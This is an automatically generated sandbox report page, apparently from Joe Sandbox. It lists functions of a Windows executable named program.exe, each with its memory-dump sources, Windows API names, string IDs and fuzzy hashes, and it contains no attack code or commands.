                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                                                              • API String ID: 3215553584-1196891531
                                                                                                                                                                                                                                              • Opcode ID: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
                                                                                                                                                                                                                                              • Instruction ID: 3fc33de8bb598934345648d721c902761075629d5de7b4a27321690c4a03c39b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7281D473E0E66385FBA49F2DC95027836A0AB11B4AF558535CB0AD7AF5CF2DED029301
                                                                                                                                                                                                                                              Function 00007FF6B750D648 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                                                              • String ID: csm
                                                                                                                                                                                                                                              • API String ID: 2395640692-1018135373
                                                                                                                                                                                                                                              • Opcode ID: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
                                                                                                                                                                                                                                              • Instruction ID: 2a6e29ca6118db7ebf224c583c939c08d5583424a0c3414f13170ac969fe1405
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1A518B77A1D7428AEB248B19E448B787391EB44B98F518134EB4EC77A8EF7DE841D700
                                                                                                                                                                                                                                              Function 00007FF6B750EED8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                                              • String ID: MOC$RCC
                                                                                                                                                                                                                                              • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                                              • Opcode ID: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
                                                                                                                                                                                                                                              • Instruction ID: 0dca6f276b202735388ca35439d1dfa12fd42c77ab39edb388c470d84faeb9dd
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D361813390CBC585DB709B19E4407AAB7A0FB85798F144225EB9D83BA9DF7CD190CB00
                                                                                                                                                                                                                                              Function 00007FF6B750F288 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                                              • String ID: csm$csm
                                                                                                                                                                                                                                              • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                                              • Opcode ID: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
                                                                                                                                                                                                                                              • Instruction ID: 347cc6605aa26888af7f23de5ebe77f6d11b9cd7a242246b2218f23e557e36dd
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FF516C73A0C3868AEB648B299854A6877A0FB55B98F144136DB8D87BE5CF3CE451C701
                                                                                                                                                                                                                                              Function 00007FF6B7507E20 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 81COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • CreateDirectoryW.KERNEL32(00000000,?,00007FF6B750352C,?,00000000,00007FF6B7503F23), ref: 00007FF6B7507F32
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CreateDirectory
                                                                                                                                                                                                                                              • String ID: %.*s$%s%c$\
                                                                                                                                                                                                                                              • API String ID: 4241100979-1685191245
                                                                                                                                                                                                                                              • Opcode ID: 302ffdc47f1f131389ecc473fe7ae023bae846d875cccfc6523225b15fd92315
                                                                                                                                                                                                                                              • Instruction ID: 2d830b80e12cbc9dbe8d8da00474cc222322cf14f104e082e1db06b220a04172
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 302ffdc47f1f131389ecc473fe7ae023bae846d875cccfc6523225b15fd92315
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D131E66271DAC145EA218B28E4503EA6358EF84BE8F440631EF6D877E9DF3CD6458700
                                                                                                                                                                                                                                              Function 00007FF6B7502810 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 65windowCOMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Message
                                                                                                                                                                                                                                              • String ID: ERROR$Error$[PYI-%d:%ls]
                                                                                                                                                                                                                                              • API String ID: 2030045667-255084403
                                                                                                                                                                                                                                              • Opcode ID: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
                                                                                                                                                                                                                                              • Instruction ID: 0951eebf42bbb2f49d1416f930d09a427540ecae0a2d2a0830ecf9075305326d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F921AE63B0CB8182E7219B58F8447EA63A4FB88784F400136EF8D97669EE3CE245C740
                                                                                                                                                                                                                                              Function 00007FF6B751C5A0 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2718003287-0
                                                                                                                                                                                                                                              • Opcode ID: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
                                                                                                                                                                                                                                              • Instruction ID: 44dc6140cc07823e08c36d7133b7fb63651f8aa41e4be9516083f75f5c8f87c4
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AAD1E073B0CA918AE711CF6AC4402AC37A1FB55799B444226DF4E97FE9EE39E046C300
                                                                                                                                                                                                                                              Function 00007FF6B751F98C Relevance: 6.2, APIs: 4, Instructions: 162COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _get_daylight$_isindst
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 4170891091-0
                                                                                                                                                                                                                                              • Opcode ID: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
                                                                                                                                                                                                                                              • Instruction ID: 2480a9834041957690d72a35a3b3ad33d18c6458603f197fed6fc41226b2a31f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6451A573F092218AEB14DF689D556BC3765AB4436AF500235DF1E96EF5DF3CAC428600
                                                                                                                                                                                                                                              Function 00007FF6B751577C Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2780335769-0
                                                                                                                                                                                                                                              • Opcode ID: 601044899bb77d1db34704472f686b9691880a3163deed0eb7e9945e8072c835
                                                                                                                                                                                                                                              • Instruction ID: 803bd9ca3fe3c0d96ccc62fc5c04e7848bbf9edbc97e47014380b2b047fb8bdb
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 601044899bb77d1db34704472f686b9691880a3163deed0eb7e9945e8072c835
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8C516A23E086518AFB10DFB994503BD27A1AB48B99F248535EF4D9BAA9DF38E4418701
                                                                                                                                                                                                                                              Function 00007FF6B75020C0 Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: LongWindow$DialogInvalidateRect
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1956198572-0
                                                                                                                                                                                                                                              • Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                                              • Instruction ID: 6214889d40ec9376fab55ed24eb7b1ce0963c1cda315b5dcd7b41a35f671fae4
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EB110C23F0C14642F655876DE98427953A2FF88784F448030DB4947BA9DD3DE6C58240
                                                                                                                                                                                                                                              Function 00007FF6B7525B1C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID: ?
                                                                                                                                                                                                                                              • API String ID: 1286766494-1684325040
                                                                                                                                                                                                                                              • Opcode ID: 21862b7f5a6063227688de7d7fc5fbfc7fa1fb1d7946118fe9e576ba790fa6aa
                                                                                                                                                                                                                                              • Instruction ID: f9009eb84b4961b74f439333b38a427d6c0a88f659bf914f75efe23bf268949c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 21862b7f5a6063227688de7d7fc5fbfc7fa1fb1d7946118fe9e576ba790fa6aa
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F941E623B1C28256FB659B29954137A67A0EF80BA4F144275EF5D86AF5DF3CD8818B00
                                                                                                                                                                                                                                              Function 00007FF6B7519014 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • _invalid_parameter_noinfo.LIBCMT ref: 00007FF6B7519046
                                                                                                                                                                                                                                                • Part of subcall function 00007FF6B751A948: RtlFreeHeap.NTDLL(?,?,?,00007FF6B7522D22,?,?,?,00007FF6B7522D5F,?,?,00000000,00007FF6B7523225,?,?,?,00007FF6B7523157), ref: 00007FF6B751A95E
                                                                                                                                                                                                                                                • Part of subcall function 00007FF6B751A948: GetLastError.KERNEL32(?,?,?,00007FF6B7522D22,?,?,?,00007FF6B7522D5F,?,?,00000000,00007FF6B7523225,?,?,?,00007FF6B7523157), ref: 00007FF6B751A968
                                                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF6B750CBA5), ref: 00007FF6B7519064
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID: C:\Users\user\Desktop\program.exe
                                                                                                                                                                                                                                              • API String ID: 3580290477-2554842565
                                                                                                                                                                                                                                              • Opcode ID: 136b352ca89953b7aac46d199a587659114d0cf60bae53edf27061cb20026a80
                                                                                                                                                                                                                                              • Instruction ID: b677119557b6f86b8c06a5fb58fd3cc327bce63cb1526ffe50d729b2e8220c3e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 136b352ca89953b7aac46d199a587659114d0cf60bae53edf27061cb20026a80
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 90418937A0CA628AEB159F2998401BD67A4EF44BD1B554039EB4E87FA5DF3CE891C340
                                                                                                                                                                                                                                              Function 00007FF6B751CC38 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                              • String ID: U
                                                                                                                                                                                                                                              • API String ID: 442123175-4171548499
                                                                                                                                                                                                                                              • Opcode ID: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
                                                                                                                                                                                                                                              • Instruction ID: a294a28bbd36a8039f0d9a75b480996b95cbcfc70026829bcab52d0d8dc4ab8f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2F41B123A1CA9585DB609F2AE4443AA67A1FB98784F444135EF4DC7BA8EF3DD441CB40
                                                                                                                                                                                                                                              Function 00007FF6B751F5B8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentDirectory
                                                                                                                                                                                                                                              • String ID: :
                                                                                                                                                                                                                                              • API String ID: 1611563598-336475711
                                                                                                                                                                                                                                              • Opcode ID: d7e4ed55f29cf6b5985c16ba7c582ed18ee62b51760ed1b5a20f115a32bf7e2e
                                                                                                                                                                                                                                              • Instruction ID: 17d1cb73cfb60a2195a6cc62f711a24f1eb5c2635f239ee9431842b37d667d3d
